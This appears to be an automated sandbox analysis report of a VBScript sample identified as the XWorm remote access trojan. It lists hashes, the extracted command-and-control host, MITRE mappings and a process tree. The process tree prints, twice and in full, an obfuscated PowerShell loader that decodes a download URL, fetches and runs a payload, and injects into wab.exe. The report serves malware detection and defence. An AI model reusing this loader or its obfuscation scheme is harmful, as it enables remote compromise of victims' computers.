Overview

overview

10

Static

static

1

upload.vbs

windows7-x64

10

upload.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    upload.vbs

  • Size

    896KB

  • MD5

    a227043beb151087c1798b6f9aaabd4c

  • SHA1

    b2c4537386ed7931d9df29719f11f0f019e0f43a

  • SHA256

    b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1

  • SHA512

    1031ce3bea154181078799db133f2a8e419f912d548b69bd21572707bd7a3cf2c44cc273b1f582a0edcae73523c2927c210c0917c758b92364d64977b2ca208e

  • SSDEEP

    12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9p:UXh+k+taGKqoJOp

Score
10/10
xwormrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upload.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"
        3⤵
          PID:4812
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"
            4⤵
              PID:4468
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1620

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lquyiasm.n1v.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Ldermachettens.Kur
        Filesize

        451KB

        MD5

        025a6247195641a554ded5d68762070f

        SHA1

        6a3e9a2bc4f57a8d63c2a860e7aa7069ddb5a0b5

        SHA256

        672dfc440d33e5cc5c8dc760df125ac4869e6bd412c97008738c3a9e9e16d9fb

        SHA512

        67333f46fdcf2b94aba54f273a5c9d06ef4ce6b9e3702b3925a8dfb56d0c2653b419015acdd54cbf6620e53d86d962dec5403215c1ad23d7891c492c4c971bdc

        Download Submit
      • memory/1620-66-0x0000000023820000-0x00000000238BC000-memory.dmp
        Filesize

        624KB

        Download
      • memory/1620-69-0x0000000023B70000-0x0000000023B7A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/1620-68-0x0000000023BC0000-0x0000000023C52000-memory.dmp
        Filesize

        584KB

        Download
      • memory/1620-65-0x0000000000790000-0x00000000007A0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1620-62-0x0000000000790000-0x00000000019E4000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/1620-61-0x0000000000790000-0x00000000019E4000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/1740-11-0x00007FFB55930000-0x00007FFB563F1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1740-12-0x00007FFB55930000-0x00007FFB563F1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1740-0-0x00007FFB55933000-0x00007FFB55935000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1740-67-0x00007FFB55930000-0x00007FFB563F1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1740-6-0x0000026DB2400000-0x0000026DB2422000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1740-44-0x00007FFB55930000-0x00007FFB563F1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1740-43-0x00007FFB55933000-0x00007FFB55935000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3476-21-0x0000000004CA0000-0x0000000004CC2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3476-39-0x0000000006D80000-0x0000000006DA2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3476-40-0x0000000007FD0000-0x0000000008574000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/3476-38-0x0000000006DF0000-0x0000000006E86000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3476-42-0x0000000008580000-0x000000000C4AA000-memory.dmp
        Filesize

        63.2MB

        Download
      • memory/3476-37-0x00000000060D0000-0x00000000060EA000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3476-36-0x00000000073A0000-0x0000000007A1A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3476-35-0x0000000005B80000-0x0000000005BCC000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3476-34-0x0000000005B40000-0x0000000005B5E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3476-33-0x0000000005670000-0x00000000059C4000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3476-23-0x0000000005500000-0x0000000005566000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3476-22-0x0000000005490000-0x00000000054F6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3476-20-0x0000000004DB0000-0x00000000053D8000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3476-19-0x0000000002210000-0x0000000002246000-memory.dmp
        Filesize

        216KB

        Download